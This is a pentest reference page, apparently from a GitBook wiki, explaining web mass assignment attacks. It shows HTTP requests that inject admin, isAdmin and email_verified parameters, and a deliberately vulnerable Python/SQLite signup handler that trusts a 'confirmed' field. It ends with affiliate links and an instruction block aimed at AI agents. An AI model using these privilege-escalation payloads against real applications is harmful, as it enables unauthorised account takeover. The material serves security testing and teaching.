# Web Mass Assignment

One of the ways that you can discover mass assignment vulnerabilities by finding interesting parameters in API documentation and then adding those parameters to requests. Look for parameters involved in user account properties, critical functions, and administrative actions.

{% hint style="success" %}
*If you do not have admin docus, then you can do a simple test by including other key-values to the JSON POST body, such as:*

*"isadmin": true,* 

*"isadmin":"true",* 

*"admin": 1,* 

*"admin": true,*
{% endhint %}

* Normal request

```
POST /editdata HTTP/1.1
Host: target.com
...

username=daffa
```

The response

```
HTTP/1.1 200 OK
...

{"status":"success","username":"daffainfo","isAdmin":"false"}
```

* Modified Request

```
POST /editdata HTTP/1.1
Host: target.com
...

username=daffa&admin=true
```

```
HTTP/1.1 200 OK
...

{"status":"success","username":"daffainfo","isAdmin":"true"}
```

Example 2

```
POST /api/register HTTP/1.1
[..]
{“email”:”user1@example.com”}

HTTP/1.1 200 OK
[..]
{”userid”:”112345”,“email”:”user1@example.com”,”email_verified”:false}
```

```
POST /api/register HTTP/1.1
[..]
{“email”:”user2@example.com”,”email_verified”:true}

HTTP/1.1 200 OK
[..]
{”userid”:”112346”,“email”:”user2@example.com”,”email_verified”:true}
```

Example - PATCH Request

```
{
    "username": "wiener",
    "email": "wiener@example.com",
    "isAdmin": false,
}
```

In addition, send a `PATCH` request with an invalid `isAdmin` parameter value:

```
{
    "username": "wiener",
    "email": "wiener@example.com",
    "isAdmin": "foo",
}
```

If the application behaves differently, this may suggest that the invalid value impacts the query logic, but the valid value doesn't.

```
{
    "username": "wiener",
    "email": "wiener@example.com",
    "isAdmin": true,
}
```

Example - nested object

```
POST /api/register HTTP/1.1
[..]
{“email”:[”user3@example.com”,”user4@example.com”]}

HTTP/1.1 200 OK
[..]
{”userid”:”112347”,“email”:[”user3@example.com”,”user4@example.com”],”email_verified”:false}
```

Other example - Fuzzcompany name or ID

```
{
"username":"hacker",
"email":"api@hacker.com",
"org": "§CompanyA§",
"password":"Password1!"
}
```

## Guess Parameters

Burp - Param Miner

<figure><img src="/files/FDlauAOSQePk6qcHpOm0" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ErRwjKNXosJzTT3imxRW" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/cTmFYM2Z2w1OGjBBTknn" alt=""><figcaption></figcaption></figure>

## Ruby on Rails

Ruby on Rails is a web application framework that is vulnerable to this type of attack.

```ruby
class User < ActiveRecord::Base
  attr_accessible :username, :email
end
```

```javascript
{ "user" => { "username" => "hacker", "email" => "hacker@example.com", "admin" => true } }
```

<figure><img src="/files/E4nULoBpLU82op3nfGK9" alt=""><figcaption></figcaption></figure>

Source code:

```python
for i,j,k in cur.execute('select * from users where username=? and password=?',(username,password)):
  if k:
    session['user']=i
    return redirect("/home",code=302)
  else:
    return render_template('login.html',value='Account is pending for approval')
```

```python
try:
  if request.form['confirmed']:
    cond=True
except:
      cond=False
with sqlite3.connect("database.db") as con:
  cur = con.cursor()
  cur.execute('select * from users where username=?',(username,))
  if cur.fetchone():
    return render_template('index.html',value='User exists!!')
  else:
    cur.execute('insert into users values(?,?,?)',(username,password,cond))
    con.commit()
    return render_template('index.html',value='Success!!')
```

username=new\&password=test\&confirmed=test

<figure><img src="/files/AtjxCVrzUQHOyUJovFQG" alt=""><figcaption></figcaption></figure>

## Resources

{% embed url="<https://www.vaadata.com/blog/what-is-mass-assignment-attacks-and-security-tips/>" %}

## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp)

[**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)

<figure><img src="/files/a876wNYE568SJIfTZVxL" alt=""><figcaption></figcaption></figure>

## Interesting Books

{% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %}
[Interesting Books](/0xss0rz/interesting-books.md)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
* [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
* [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/web-mass-assignment.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.